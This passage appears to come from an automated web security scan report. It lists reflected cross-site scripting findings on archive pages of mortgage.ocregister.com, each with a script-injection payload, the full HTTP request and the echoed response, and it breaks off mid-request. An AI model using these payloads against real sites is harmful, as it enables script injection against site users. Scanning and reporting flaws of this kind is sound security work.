Path:   /2007/10/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218bc"><script>alert(1)</script>3aaf6a800aa was submitted in the REST URL parameter 2. This input was echoed as 218bc\"><script>alert(1)</script>3aaf6a800aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/10218bc"><script>alert(1)</script>3aaf6a800aa/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10218bc\"><script>alert(1)</script>3aaf6a800aa/feed/" />
...[SNIP]...

1.236. http://mortgage.ocregister.com/2007/10/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a6b"><script>alert(1)</script>aa7394ea76f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7a6b\"><script>alert(1)</script>aa7394ea76f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/10/?b7a6b"><script>alert(1)</script>aa7394ea76f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10/?b7a6b\"><script>alert(1)</script>aa7394ea76f=1feed/" />
...[SNIP]...

1.237. http://mortgage.ocregister.com/2007/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78913"><script>alert(1)</script>415c27e9059 was submitted in the REST URL parameter 1. This input was echoed as 78913\"><script>alert(1)</script>415c27e9059 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200778913"><script>alert(1)</script>415c27e9059/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200778913\"><script>alert(1)</script>415c27e9059/11/feed/" />
...[SNIP]...

1.238. http://mortgage.ocregister.com/2007/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a46"><script>alert(1)</script>b3caab2696d was submitted in the REST URL parameter 2. This input was echoed as 55a46\"><script>alert(1)</script>b3caab2696d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/1155a46"><script>alert(1)</script>b3caab2696d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/1155a46\"><script>alert(1)</script>b3caab2696d/feed/" />
...[SNIP]...

1.239. http://mortgage.ocregister.com/2007/11/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d88ca"><script>alert(1)</script>829bb9d7991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d88ca\"><script>alert(1)</script>829bb9d7991 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/11/?d88ca"><script>alert(1)</script>829bb9d7991=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/11/?d88ca\"><script>alert(1)</script>829bb9d7991=1feed/" />
...[SNIP]...

1.240. http://mortgage.ocregister.com/2007/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83bb0"><script>alert(1)</script>5b51746308e was submitted in the REST URL parameter 1. This input was echoed as 83bb0\"><script>alert(1)</script>5b51746308e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200783bb0"><script>alert(1)</script>5b51746308e/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200783bb0\"><script>alert(1)</script>5b51746308e/12/feed/" />
...[SNIP]...

1.241. http://mortgage.ocregister.com/2007/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7553a"><script>alert(1)</script>4b6519fec9b was submitted in the REST URL parameter 2. This input was echoed as 7553a\"><script>alert(1)</script>4b6519fec9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/127553a"><script>alert(1)</script>4b6519fec9b/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/127553a\"><script>alert(1)</script>4b6519fec9b/feed/" />
...[SNIP]...

1.242. http://mortgage.ocregister.com/2007/12/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db24"><script>alert(1)</script>33a184a2162 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4db24\"><script>alert(1)</script>33a184a2162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/12/?4db24"><script>alert(1)</script>33a184a2162=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/12/?4db24\"><script>alert(1)</script>33a184a2162=1feed/" />
...[SNIP]...

1.243. http://mortgage.ocregister.com/2008/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d30"><script>alert(1)</script>9a1798c9a18 was submitted in the REST URL parameter 1. This input was echoed as 47d30\"><script>alert(1)</script>9a1798c9a18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200847d30"><script>alert(1)</script>9a1798c9a18/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200847d30\"><script>alert(1)</script>9a1798c9a18/01/feed/" />
...[SNIP]...

1.244. http://mortgage.ocregister.com/2008/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de23d"><script>alert(1)</script>2d509002565 was submitted in the REST URL parameter 2. This input was echoed as de23d\"><script>alert(1)</script>2d509002565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/01de23d"><script>alert(1)</script>2d509002565/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01de23d\"><script>alert(1)</script>2d509002565/feed/" />
...[SNIP]...

1.245. http://mortgage.ocregister.com/2008/01/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd34"><script>alert(1)</script>6eeaa914028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fd34\"><script>alert(1)</script>6eeaa914028 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/01/?1fd34"><script>alert(1)</script>6eeaa914028=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01/?1fd34\"><script>alert(1)</script>6eeaa914028=1feed/" />
...[SNIP]...

1.246. http://mortgage.ocregister.com/2008/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/02/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3080f"><script>alert(1)</script>0eba11e28c7 was submitted in the REST URL parameter 1. This input was echoed as 3080f\"><script>alert(1)</script>0eba11e28c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20083080f"><script>alert(1)</script>0eba11e28c7/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083080f\"><script>alert(1)</script>0eba11e28c7/02/feed/" />
...[SNIP]...

1.247. http://mortgage.ocregister.com/2008/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2dc"><script>alert(1)</script>3615908630 was submitted in the REST URL parameter 2. This input was echoed as be2dc\"><script>alert(1)</script>3615908630 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/02be2dc"><script>alert(1)</script>3615908630/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/02be2dc\"><script>alert(1)</script>3615908630/feed/" />
...[SNIP]...

1.248. http://mortgage.ocregister.com/2008/02/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44db"><script>alert(1)</script>debe3db6973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c44db\"><script>alert(1)</script>debe3db6973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/02/?c44db"><script>alert(1)</script>debe3db6973=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/02/?c44db\"><script>alert(1)</script>debe3db6973=1feed/" />
...[SNIP]...

1.249. http://mortgage.ocregister.com/2008/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/03/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfaad"><script>alert(1)</script>feb9e55050e was submitted in the REST URL parameter 1. This input was echoed as cfaad\"><script>alert(1)</script>feb9e55050e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008cfaad"><script>alert(1)</script>feb9e55050e/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
